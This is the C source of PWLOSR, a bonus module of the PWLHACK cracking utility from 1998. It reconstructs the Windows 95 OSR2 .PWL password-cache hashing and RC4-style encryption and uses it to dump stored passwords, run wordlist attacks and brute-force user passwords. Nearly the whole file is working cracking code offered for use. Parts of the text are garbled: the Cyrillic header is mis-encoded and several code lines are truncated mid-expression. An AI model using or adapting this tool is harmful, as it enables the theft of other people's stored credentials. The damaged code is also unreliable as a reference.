www.pudn.com > pwl_h410.zip > PWLOSR.C
(*Comment[1]/*)Program Comment{Ŀ
This is the Bonus Pack part of the PWLHACK v4.x cracking utility. It must
be distributed _FREELY_. You may use it for educational purposes. If You
want to add some functionality into PWLHACK itself - You can write to me
and ask me to do it. I written this product and I support it now! If You
will use some part of this source, Please, refer on me. Don't remove this
header, just compile or use with it! ;-)
FidoNet: 2:461/133.69 Hard Wisdom
E-Mail: hw@p69.f133.n461.z2.fidonet.org
祪, ⠢塞 PWLHACK v4.x ⨫⮩ PWL 䠩-
. , ᠬ ணࠬ, ࠭ ( -
࠭祭 - ). ᯮ짮 -
⥫ 楫, , ᥭ. 室
- ७ 㭪樮쭮 ᠬ ⨫ - ᥣ -
. 業ࠫ (ࠧ ᮧ ). -
짮 殢 ( ⥩) ணࠬ - ⥫쭮 -
뫪. 㤠 ⠢, ! ;-)
: 2:461/133.69 Hard Wisdom
-뫮: hw@p69.f133.n461.z2.fidonet.org
[]*/)={(int* )&Comment};
/*******************************************************************/
/* */
/* The MD95 OSR2 PWL's storage crypting method has been changed. */
/* This is the Security Madness to implement such protection on */
/* such Operating System, but. . . I present to You this. . . */
/* */
/* "The OSR2 .PWL's files Manager" v2.0 */
/* (C) 19-Mar-1998y by Hard Wisdom */
/* */
/*******************************************************************/
/*******************************************************************/
/* MSPWL32.dll - original offsets (only for referrencing): */
/* --------------------------------------------------------------- */
/* 7FC61CFE - NewCache opening procedure */
/* 7FC61F00 - NewCache find/use resource part */
/* 7FC63D6F - make_cryption_table() */
/* 7FC61C1F - check_cryption_sign() */
/* 7FC53F50 - init_hash() */
/* 7FC63F9A - add_hash() */
/* 7FC640B7 - flush_hash() */
/* 7FC6422A - calc_hash() */
/* 7FC61000 - init_xor_table() */
/* 7FC61088 - use_xor_table() */
/* --------------------------------------------------------------- */
/* Reconstruction is partial but the code pecularity is preserved! */
/*******************************************************************/
#include /* using standard libraries: file io */
#include /* strings processing */
#include /* help routines */
#include /* time accessing */
#include /* dos breaking control */
/*******************************************************************/
typedef unsigned char byte; /* primitive types, as in Pascal */
typedef unsigned short word;
typedef unsigned long dword;
typedef dword hash_counters[0x04]; /* internal hashing counters */
typedef byte hash_result[0x10]; /* end hashing result */
typedef dword hash_key[0x10]; /* data buffer for hashing */
typedef struct { /* main hash container structure */
dword idx[0x02]; /* internal data position pointer */
hash_counters cnt; /* internal hash counters */
byte buf[0x40]; /* buffer for hashing data */
hash_result res;
dword unknown; /* purpose unknown, but present in code. I */
/* think this is some extension for future */
/* expanded cache handling, Ptr to Crypto? */
/* Not used now. */
} hash_container;
typedef struct { /* main cryptotable, produced after hashing */
dword magic; /* internal pointer to LastInit procedure. */
byte body[0x100]; /* data table itself */
byte c1,c2; /* crypto pointers into data table */
hash_result key; /* hash key for table building */
} xor_table;
typedef struct { /* checking part into PWL header */
hash_result CryptoSign; /* Crypting CryptoSign */
hash_result CheckSign; /* Checking CryptoSign */
} check_pack;
typedef struct { /* PWL file header itself */
dword Sign; /* .PWL file signature */
dword UnknownC; /* ?? Strange counter */
byte ResLink[0x100]; /* Resource link index */
byte ResKey[0x100]; /* Resource key entry */
dword HdrOfs; /* Offset to CryptoHdr */
dword CryptoSeed[0x11]; /* Resource CryptoSeed */
word UnkAlign; /* ?? Just alignment */
check_pack Check; /* Checking crypt-sign */
word ResOffsets[0xF]; /* Resources offsets. */
} pwl_hdr;
/*=================================================================*/
/* Security Partition */
/*=================================================================*/
void init_xor_table(xor_table* x) { /* initializing cryptotable */
int i,p,t,tt; x->c1=0,x->c2=0;
for (i=0;i<=255;x->body[i]=i,i++);
t=0; for (i=0,p=0;i<=255;i++,p=i & 0x0F) {
t+=x->key[p]+x->body[i]; t&=0xFF;
tt=x->body[i]; x->body[i]=x->body[t]; x->body[t]=tt;
}
}
/*=================================================================*/
void use_xor_table(xor_table* x, void* data, word datalen) {
byte p1,p2,t; /* en/decrypting the data via cryptotable */
p1=x->c1; p2=x->c2;
while (datalen--) { p2+=x->body[++p1];
t=x->body[p1]; x->body[p1]=x->body[p2]; x->body[p2]=t;
t+=x->body[p1]; *((byte*)data)++^=x->body[t];
}; x->c1=p1; x->c2=p2;
}
/*=================================================================*/
dword SwaBits(dword Parm, byte Where) { /* Swap Bits into Dword */
return (Parm << Where) | (Parm >> 0x20 - Where);
}
/*=================================================================*/
void init_hash(hash_container* h) { /* hashing initialization */
h->idx[0]=0; h->idx[1]=0;
h->cnt[0]=0x67452301; h->cnt[1]=0xEFCDAB89; /* Yeah. Num -> ~,Rev */
h->cnt[2]=0x98BADCFE; h->cnt[3]=0x10325476; /* *-> Rev -> ~,Rev */
}
/*=================================================================*/
void calc_hash(hash_counters c,hash_key k) { /* main hashing proc. */
dword p1,p2,p3,p4; /* What is this? MD5, MD4, MD2 ? or MD95 ;-) */
p1=c[0]; p2=c[1]; p3=c[2]; p4=c[3];
/*-----------------------------------------------------------------*/
p1+=((~p2 & p4) | (p2 & p3))+k[0x0]-0x28955b88; p1=SwaBits(p1,0x07)+p2;
p4+=((~p1 & p3) | (p1 & p2))+k[0x1]-0x173848AA; p4=SwaBits(p4,0x0C)+p1;
p3+=((~p4 & p2) | (p4 & p1))+k[0x2]+0x242070DB; p3=SwaBits(p3,0x11)+p4;
p2+=((~p3 & p1) | (p3 & p4))+k[0x3]-0x3E423112; p2=SwaBits(p2,0x16)+p3;
p1+=((~p2 & p4) | (p2 & p3))+k[0x4]-0x0A83F051; p1=SwaBits(p1,0x07)+p2;
p4+=((~p1 & p3) | (p1 & p2))+k[0x5]+0x4787C62A; p4=SwaBits(p4,0x0C)+p1;
p3+=((~p4 & p2) | (p4 & p1))+k[0x6]-0x57CFB9ED; p3=SwaBits(p3,0x11)+p4;
p2+=((~p3 & p1) | (p3 & p4))+k[0x7]-0x02B96AFF; p2=SwaBits(p2,0x16)+p3;
p1+=((~p2 & p4) | (p2 & p3))+k[0x8]+0x698098D8; p1=SwaBits(p1,0x07)+p2;
p4+=((~p1 & p3) | (p1 & p2))+k[0x9]-0x74BB0851; p4=SwaBits(p4,0x0C)+p1;
p3+=((~p4 & p2) | (p4 & p1))+k[0xA]-0x0000A44F; p3=SwaBits(p3,0x11)+p4;
p2+=((~p3 & p1) | (p3 & p4))+k[0xB]-0x76A32842; p2=SwaBits(p2,0x16)+p3;
p1+=((~p2 & p4) | (p2 & p3))+k[0xC]+0x6B901122; p1=SwaBits(p1,0x07)+p2;
p4+=((~p1 & p3) | (p1 & p2))+k[0xD]-0x02678E6D; p4=SwaBits(p4,0x0C)+p1;
p3+=((~p4 & p2) | (p4 & p1))+k[0xE]-0x5986BC72; p3=SwaBits(p3,0x11)+p4;
p2+=((~p3 & p1) | (p3 & p4))+k[0xF]+0x49B40821; p2=SwaBits(p2,0x16)+p3;
/*-----------------------------------------------------------------*/
p1+=((~p4 & p3) | (p4 & p2))+k[0x1]-0x09E1DA9E; p1=SwaBits(p1,0x05)+p2;
p4+=((~p3 & p2) | (p3 & p1))+k[0x6]-0x3FBF4CC0; p4=SwaBits(p4,0x09)+p1;
p3+=((~p2 & p1) | (p2 & p4))+k[0xB]+0x265E5A51; p3=SwaBits(p3,0x0E)+p4;
p2+=((~p1 & p4) | (p1 & p3))+k[0x0]-0x16493856; p2=SwaBits(p2,0x14)+p3;
p1+=((~p4 & p3) | (p4 & p2))+k[0x5]-0x29D0EFA3; p1=SwaBits(p1,0x05)+p2;
p4+=((~p3 & p2) | (p3 & p1))+k[0xA]+0x02441453; p4=SwaBits(p4,0x09)+p1;
p3+=((~p2 & p1) | (p2 & p4))+k[0xF]-0x275E197F; p3=SwaBits(p3,0x0E)+p4;
p2+=((~p1 & p4) | (p1 & p3))+k[0x4]-0x182C0438; p2=SwaBits(p2,0x14)+p3;
p1+=((~p4 & p3) | (p4 & p2))+k[0x9]+0x21E1CDE6; p1=SwaBits(p1,0x05)+p2;
p4+=((~p3 & p2) | (p3 & p1))+k[0xE]-0x3CC8F82A; p4=SwaBits(p4,0x09)+p1;
p3+=((~p2 & p1) | (p2 & p4))+k[0x3]-0x0B2AF279; p3=SwaBits(p3,0x0E)+p4;
p2+=((~p1 & p4) | (p1 & p3))+k[0x8]+0x455A14ED; p2=SwaBits(p2,0x14)+p3;
p1+=((~p4 & p3) | (p4 & p2))+k[0xD]-0x561C16FB; p1=SwaBits(p1,0x05)+p2;
p4+=((~p3 & p2) | (p3 & p1))+k[0x2]-0x03105C08; p4=SwaBits(p4,0x09)+p1;
p3+=((~p2 & p1) | (p2 & p4))+k[0x7]+0x676F02D9; p3=SwaBits(p3,0x0E)+p4;
p2+=((~p1 & p4) | (p1 & p3))+k[0xC]-0x72D5B376; p2=SwaBits(p2,0x14)+p3;
/*-----------------------------------------------------------------*/
p1+=(p4 ^ p3 ^ p2)+k[0x5]-0x0005C6BE; p1=SwaBits(p1,0x04)+p2;
p4+=(p3 ^ p2 ^ p1)+k[0x8]-0x788E097F; p4=SwaBits(p4,0x0B)+p1;
p3+=(p4 ^ p2 ^ p1)+k[0xB]+0x6D9D6122; p3=SwaBits(p3,0x10)+p4;
p2+=(p4 ^ p3 ^ p1)+k[0xE]-0x021AC7F4; p2=SwaBits(p2,0x17)+p3;
p1+=(p4 ^ p3 ^ p2)+k[0x1]-0x5B4115BC; p1=SwaBits(p1,0x04)+p2;
p4+=(p3 ^ p2 ^ p1)+k[0x4]+0x4BDECFA9; p4=SwaBits(p4,0x0B)+p1;
p3+=(p4 ^ p2 ^ p1)+k[0x7]-0x0944B4A0; p3=SwaBits(p3,0x10)+p4;
p2+=(p4 ^ p3 ^ p1)+k[0xA]-0x41404390; p2=SwaBits(p2,0x17)+p3;
p1+=(p4 ^ p3 ^ p2)+k[0xD]+0x289B7EC6; p1=SwaBits(p1,0x04)+p2;
p4+=(p3 ^ p2 ^ p1)+k[0x0]-0x155ED806; p4=SwaBits(p4,0x0B)+p1;
p3+=(p4 ^ p2 ^ p1)+k[0x3]-0x2B10CF7B; p3=SwaBits(p3,0x10)+p4;
p2+=(p4 ^ p3 ^ p1)+k[0x6]+0x04881D05; p2=SwaBits(p2,0x17)+p3;
p1+=(p4 ^ p3 ^ p2)+k[0x9]-0x262B2FC7; p1=SwaBits(p1,0x04)+p2;
p4+=(p3 ^ p2 ^ p1)+k[0xC]-0x1924661B; p4=SwaBits(p4,0x0B)+p1;
p3+=(p4 ^ p2 ^ p1)+k[0xF]+0x1FA27CF8; p3=SwaBits(p3,0x10)+p4;
p2+=(p4 ^ p3 ^ p1)+k[0x2]-0x3B53A99B; p2=SwaBits(p2,0x17)+p3;
/*-----------------------------------------------------------------*/
p1+=((~p4 | p2) ^ p3)+k[0x0]-0x0BD6DDBC; p1=SwaBits(p1,0x06)+p2;
p4+=((~p3 | p1) ^ p2)+k[0x7]+0x432AFF97; p4=SwaBits(p4,0x0A)+p1;
p3+=((~p2 | p4) ^ p1)+k[0xE]-0x546BDC59; p3=SwaBits(p3,0x0F)+p4;
p2+=((~p1 | p3) ^ p4)+k[0x5]-0x036C5FC7; p2=SwaBits(p2,0x15)+p3;
p1+=((~p4 | p2) ^ p3)+k[0xC]+0x655B59C3; p1=SwaBits(p1,0x06)+p2;
p4+=((~p3 | p1) ^ p2)+k[0x3]-0x70F3336E; p4=SwaBits(p4,0x0A)+p1;
p3+=((~p2 | p4) ^ p1)+k[0xA]-0x00100B83; p3=SwaBits(p3,0x0F)+p4;
p2+=((~p1 | p3) ^ p4)+k[0x1]-0x7A7BA22F; p2=SwaBits(p2,0x15)+p3;
p1+=((~p4 | p2) ^ p3)+k[0x8]+0x6FA87E4F; p1=SwaBits(p1,0x06)+p2;
p4+=((~p3 | p1) ^ p2)+k[0xF]-0x01D31920; p4=SwaBits(p4,0x0A)+p1;
p3+=((~p2 | p4) ^ p1)+k[0x6]-0x5CFEBCEC; p3=SwaBits(p3,0x0F)+p4;
p2+=((~p1 | p3) ^ p4)+k[0xD]+0x4E0811A1; p2=SwaBits(p2,0x15)+p3;
p1+=((~p4 | p2) ^ p3)+k[0x4]-0x08AC817E; p1=SwaBits(p1,0x06)+p2;
p4+=((~p3 | p1) ^ p2)+k[0xB]-0x42C50DCB; p4=SwaBits(p4,0x0A)+p1;
p3+=((~p2 | p4) ^ p1)+k[0x2]+0x2AD7D2BB; p3=SwaBits(p3,0x0F)+p4;
p2+=((~p1 | p3) ^ p4)+k[0x9]-0x14792C6F; p2=SwaBits(p2,0x15)+p3;
/*-----------------------------------------------------------------*/
c[0]+=p1; c[1]+=p2; c[2]+=p3; c[3]+=p4;
}
/*=================================================================*/
void add_hash(hash_container* cont, void* data, word datalen) {
hash_key k; dword p1,p2,p3,p4; /* add some data to hash */
p1=(cont->idx[0]>>3) & 0x3F; /* Just one large 2DWord Plus */
if ((datalen<<3)+cont->idx[0] < cont->idx[0]) cont->idx[1]++;
cont->idx[0]+=datalen<<3; cont->idx[1]+=datalen >> 0x1D;
for (;p2=datalen--,p2>0;) {
cont->buf[p1]=*((byte*)data)++;
if (++p1==0x40) {
for (p3=0,p4=0;p3<0x10;p3++,p4+=4)
k[p3]=((dword)cont->buf[p4+1] << 0x08)+ /* IMHO memcpy better */
((dword)cont->buf[p4+3] << 0x18)+
((dword)cont->buf[p4+2] << 0x10)+
((dword)cont->buf[p4+0] << 0x00);
calc_hash(cont->cnt,k); p1=0;
}/*if*/
}/*for*/
}
/*=================================================================*/
void flush_hash(hash_container* cont) { /* drop buffer & make hash */
byte zero[0x40]={0x80,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,};
hash_key k; dword p1,p2,p3,p4;
k[0x0E]=cont->idx[0]; k[0x0F]=cont->idx[1]; /* BUG, will be del. */
p1=(cont->idx[0]>>3) & 0x3F; /* after buf overflowed!!! */
if (p1<0x38) p2=0x38-p1; else p2=0x78-p1;
add_hash(cont,zero,p2); /* Must be at this point. */
for (p3=0,p4=0;p3<0x0E;p3++,p4+=4)
k[p3]=((dword)cont->buf[p4+1] << 0x08)+ /* IMHO memcpy is better */
((dword)cont->buf[p4+3] << 0x18)+
((dword)cont->buf[p4+2] << 0x10)+
((dword)cont->buf[p4+0] << 0x00);
calc_hash(cont->cnt,k);
for (p3=0,p4=0;p3<0x04;p3++,p4+=4) {
cont->res[p4+0]=cont->cnt[p3] >> 0x00; /* IMHO memcpy is better */
cont->res[p4+1]=cont->cnt[p3] >> 0x08;
cont->res[p4+2]=cont->cnt[p3] >> 0x10;
cont->res[p4+3]=cont->cnt[p3] >> 0x18;
};
}
/*=================================================================*/
void make_cryption_table(xor_table* t, char* name, char* pwd,
dword Seed1, dword Seed2) {
hash_container h1,h2; t->magic=0x7FC64FD8; /* Int. CryptoInit Ptr */
init_hash(&h1); /* main crypto maker procedure */
add_hash(&h1,&Seed1,sizeof(Seed1));
add_hash(&h1,name,strlen(name)+1);
add_hash(&h1,&Seed2,sizeof(Seed2));
flush_hash(&h1);
init_hash(&h2);
add_hash(&h2,pwd,strlen(pwd)+1);
add_hash(&h2,&h1.res,sizeof(h1.res));
flush_hash(&h2);
memcpy(t->key,h2.res,sizeof(h2.res)); /* Lonely place where do it */
memchr(&h1,sizeof(h1),0); memchr(&h2,sizeof(h2),0); /* BUG Nafig? */
init_xor_table(t);
}
/*=================================================================*/
int check_cryption_sign(char* name, hash_result CryptoSign,
hash_result CheckSign) {
hash_container h; int i; /* checking decryption legacy */
init_hash(&h); add_hash(&h,name,strlen(name)+1);
add_hash(&h,CryptoSign,sizeof(hash_result)); flush_hash(&h);
return memcmp(h.res,CheckSign,sizeof(hash_result));
}
/*=================================================================*/
/* Service Partition */
/*=================================================================*/
void error(int num, char* s) { /* simple error handler */
printf("Error (%d): %s!\n",num,s); exit(num);
}
/*=================================================================*/
int LookUp(char* s, char c) { /* returns char position in string */
int i=0;
while (*s) if (*s++==c) return i; else i++;
return -1;
}
/*=================================================================*/
char* UpStr(char* s) { /* cyr. 866 string upcase conversion */
char* r; r=s;
while (*s) *s++=(*s>='')&&(*s<='')?*s=*s-''+'':
(*s>='')&&(*s<='')?*s=*s-''+'':
(*s>='a')&&(*s<='z')?*s=*s-'z'+'Z':*s;
return r;
}
/*=================================================================*/
char* LnTrim(char* s) { /* cut string after \n */
char* r; r=s;
do *s=(*s==0x0A)?0x00:*s; while (*s++);
return r;
}
/*=================================================================*/
/* Main Partition */
/*=================================================================*/
#define MaxPwlSize 0x1000 /* main restrictions */
#define PwlSign 0x968582E3
#define PwlHdr 0x252
#define MaxEnumPwd 0x20
#define SessionFile "PWLOSR.BRK"
#define InitializeFile "PWLOSR.INI"
typedef struct { /* internal PWL file representation */
union { /* with supplementary fields */
pwl_hdr Hdr;
byte buf[MaxPwlSize];
} File;
word ResEntry[0x11];
word ResSz[0x10];
} PwlFile;
/*=================================================================*/
dword read_pwl_file(char* pwd_file,PwlFile* b) { /* PWL read/check */
FILE* f; dword sz; char s[256];
if ((f=fopen(pwd_file,"rb"))==NULL)
error(2,"Can't open necessary PWL file");
fseek(f,0,SEEK_END); sz=ftell(f);
fseek(f,0,SEEK_SET); fread(b,sizeof(PwlFile),1,f); fclose(f);
if (ferror(f)) error(2,"I/O failure during reading PWL file");
if (sz>MaxPwlSize) error(2,"Desired PWL file too large for analysing");
sprintf(s,"%.8lX - %s",
b->File.Hdr.Sign,"Oops, This Version is not supported");
if (b->File.Hdr.Sign!=PwlSign) error(1,s);
sprintf(s,"%.8lX - %s",b->File.Hdr.HdrOfs,"Invalid header offset");
if (b->File.Hdr.HdrOfs!=PwlHdr) error(1,s);
return sz;
}
/*=================================================================*/
void dump_pwl_file(char* pwd_file, char* pwd_name, char* pwd_pass, int p) {
PwlFile b; FILE* f; dword sz; char s[256]; xor_table x;
int r,i,j,jj,tr0,tr1,k,kk;
sz=read_pwl_file(pwd_file,&b);
/*-----------------------------------------------------------------*/
printf("File: '%s' has size %lXh bytes\n",pwd_file,sz);
printf("for user '%s' with password '%s' contains:\n\n",pwd_name,pwd_pass);
/*-----------------------------------------------------------------*/
make_cryption_table(&x,pwd_name,pwd_pass,-1,b.File.Hdr.CryptoSeed[0x10]);
use_xor_table(&x,&b.File.Hdr.Check,sizeof(b.File.Hdr.Check));
use_xor_table(&x,&b.File.Hdr.ResOffsets,sizeof(b.File.Hdr.ResOffsets));
r=check_cryption_sign(pwd_name,b.File.Hdr.Check.CryptoSign,
b.File.Hdr.Check.CheckSign);
if (r) error(1,"Sorry, invalid UserName or Password have been entered");
b.ResEntry[0]=0x290; b.ResEntry[0x10]=sz;
for (i=0;i<0x0F;i++) b.ResEntry[i+1]=b.File.Hdr.ResOffsets[i];
for (i=0;i<0x10;i++) b.ResSz[i]=b.ResEntry[i+1]-b.ResEntry[i];
for (i=0;i<0x10;i++) {
make_cryption_table(&x,pwd_name,pwd_pass,i,b.File.Hdr.CryptoSeed[i]);
use_xor_table(&x,&b.File.buf[b.ResEntry[i]],b.ResSz[i]);
}
/*-----------------------------------------------------------------*/
if (p) {
printf("-[Technical Information]---------------------------------------\n");
printf(" Password file version: %.8lX; Offset to Header: %.8lX\n",
b.File.Hdr.Sign,b.File.Hdr.HdrOfs);
printf(" Unknown Align: %.4X; UnkCount: %.8lX; CheckSeed: %.8lX\n",
b.File.Hdr.UnkAlign,b.File.Hdr.UnknownC,
b.File.Hdr.CryptoSeed[0x10]);
printf(" CryptoSeed Array = ( %.8lX",b.File.Hdr.CryptoSeed[0]);
for (i=1;i<0x10;printf("%s%.8lX",!(i&0x3)?"\n ":", ",
b.File.Hdr.CryptoSeed[i]),i++);
printf(" )\n");
printf("-[Resources pointers]------------------------------------------");
for (i=0;i<0x100;printf("%s%.2hX",!(i&0xF)?"\n":
!(i&0x7)?" - ":" ",
b.File.Hdr.ResLink[i]),i++);
printf("\n-[Resources key indexes]---------------------------------------");
for (i=0;i<0x100;printf("%s%.2hX",!(i&0xF)?"\n":
!(i&0x7)?" - ":" ",
b.File.Hdr.ResKey[i]),i++); printf("\n");
printf("---------------------------------------------------------------\n");
printf(" CryptoSign = "); for (i=0;i<0x10;printf(" %.2hX",
b.File.Hdr.Check.CryptoSign[i++]));
printf("\n CheckoSign = "); for (i=0;i<0x10;printf(" %.2hX",
b.File.Hdr.Check.CheckSign[i++])); printf("\n");
printf("---------------------------------------------------------------\n");
printf(" Data = ( %.4X",b.ResEntry[0]);
for (i=1;i<0x11;printf("%s%.4X",i==9?"\n ":", ",
b.ResEntry[i]),i++); printf(" )\n");
printf(" Len. = ( %.4X",b.ResSz[0]-2);
for (i=1;i<0x10;printf("%s%.4X",i==9?"\n ":", ",
b.ResSz[i]-2),i++); printf(" )\n");
printf("-[Dump]--------------------------------------------------------");
for (j=0,i=b.ResEntry[0x0];i32?b.File.buf[i]:'.');
j=(j==15)?0:j+1;
}; printf("\n");
printf("---------------------------------------------------------------\n");
printf("\n");
}
/*-----------------------------------------------------------------*/
printf("-[Type]-[The resource location string]--------------[Password]-\n");
tr0=0,tr1=0; for (i=0;i<0x10;i++) if (b.ResSz[i]>8) {
j=b.ResEntry[i]; jj=b.ResEntry[i+1]-2; tr0++;
while (j1000?t/1000*55:t*55/1000;
printf("Elapsed time %lu seconds; Average speed %lu passwords per second.\n",
t,t>0?pwd_cnt/t:pwd_cnt);
printf("Cracked passwords %u. %s.\n",pwd_ok,
pwd_ok!=0?"Check them under MD95 Logon":
"Sorry, Today is not Your day");
if (pwd_fault) {
if ((f=fopen(SessionFile,"wb"))==NULL)
error(2,"Can't create session RIP file");
if (hdl_type)
fprintf(f,"$%s\r\n%s\r\n%s\r\n%lu\r\n",rip_name,rip_user,rip_voc,rip_pos);
else
fprintf(f,"!%s\r\n%s\r\n%s\r\n",rip_name,rip_user,rip_password);
fclose(f);
if (ferror(f)) error(2,"Session RIP creation failure");
else fprintf(stderr,"Session RIP file created successfully!\n");
}; return 0;
}; last_raise=clock();
fprintf(stderr,
"\nCurrently interested moments %u, %s.\n",pwd_ok,
(pwd_ok==0)?"nothing to see":"look at them after all");
if (hdl_type)
fprintf(stderr,
"Currently trained %lu passwords, Vocabulary position %lu,\n",
pwd_cnt,rip_pos);
else
fprintf(stderr,
"Currently trained %lu passwords, Last trained password is '%s',\n",
pwd_cnt,rip_password);
fprintf(stderr,"Hit the Ctrl+Break again within 1 second to exit!!!\n");
return 1;
}
/*=================================================================*/
void voc_pwl_file(char* pwd_file, char* pwd_name,
char* voc_file, dword start_voc_pos) {
FILE *v,*f; PwlFile b; xor_table x;
check_pack c; char s[256]; int r;
if ((v=fopen(voc_file,"r"))==NULL) error(2,"Can't open vocabulary file");
fseek(v,start_voc_pos,SEEK_SET); read_pwl_file(pwd_file,&b);
memcpy(&c,&b.File.Hdr.Check,sizeof(c));
rip_name=pwd_file; rip_user=pwd_name; rip_voc=voc_file;
start_time=clock(); last_raise=0; pwd_cnt=0;
rip_pos=start_voc_pos; pwd_fault=1; pwd_ok=0;
hdl_type=1; ctrlbrk(&enum_hdl);
/*-----------------------------------------------------------------*/
make_cryption_table(&x,pwd_name,"",-1,b.File.Hdr.CryptoSeed[0x10]);
use_xor_table(&x,&b.File.Hdr.Check,sizeof(b.File.Hdr.Check));
r=check_cryption_sign(pwd_name,b.File.Hdr.Check.CryptoSign,
b.File.Hdr.Check.CheckSign);
if (!r) {printf("Maybe - think about this.\n\n"); pwd_ok++;};
printf("Beginning vocabulary session for file '%s',\n",pwd_file);
printf("of user '%s' via vocabulary '%s'.\n",pwd_name,voc_file);
/*-----------------------------------------------------------------*/
while (!feof(v)) {
fgets(s,sizeof(s),v); if (ferror(v))
error(2,"I/O failure during vocabulary enumerating");
LnTrim(UpStr(s)); rip_pos=ftell(v); pwd_cnt++;
memcpy(&b.File.Hdr.Check,&c,sizeof(c));
make_cryption_table(&x,pwd_name,s,-1,b.File.Hdr.CryptoSeed[0x10]);
use_xor_table(&x,&b.File.Hdr.Check,sizeof(b.File.Hdr.Check));
r=check_cryption_sign(pwd_name,b.File.Hdr.Check.CryptoSign,
b.File.Hdr.Check.CheckSign);
if (!r) {printf("Password '%s' - maybe correct!\n",s); pwd_ok++;};
}; fclose(v); pwd_fault=0; enum_hdl();
}
/*=================================================================*/
void try_pwl_file(char* pwd_file, char* pwd_name, char* pwd_seed) {
char pwd[256], enum_str[256]; byte mask[256]; check_pack c;
FILE* f; PwlFile b; xor_table x; int r,upper,i,l;
if ((f=fopen(InitializeFile,"r"))==NULL) {
if ((f=fopen(InitializeFile,"w"))==NULL)
error(2,"Unable to create initialization file");
fprintf(f,"%s%s%s\n","0123456789",
"ABCDEFGHIJKLMNOPQRSTUVWXYZ",
"");
fclose(f);
error(0,"Created default initialization file, inspect and run again");
} else {
fgets(enum_str,sizeof(enum_str),f); /* read the initialization file */
LnTrim(UpStr(enum_str)); upper=strlen(enum_str)-1; fclose(f);
if (upper<=0) error(1,"No enumeration string, nothing to do");
}; strcpy(pwd,pwd_seed);
for(i=0;i>.\n",pwd_name,enum_str);
l=strlen(pwd); do { printf("Using password length %d characters.\n",l);
do { asm mov ah,30h; asm int 21h; /* Yield. For break detection. */
memcpy(&b.File.Hdr.Check,&c,sizeof(c)); pwd_cnt++;
make_cryption_table(&x,pwd_name,pwd,-1,b.File.Hdr.CryptoSeed[0x10]);
use_xor_table(&x,&b.File.Hdr.Check,sizeof(b.File.Hdr.Check));
r=check_cryption_sign(pwd_name,b.File.Hdr.Check.CryptoSign,
b.File.Hdr.Check.CheckSign);
if (!r) {printf("Password '%s' - maybe correct!\n",pwd); pwd_ok++;};
i=0; while (mask[i]==upper && i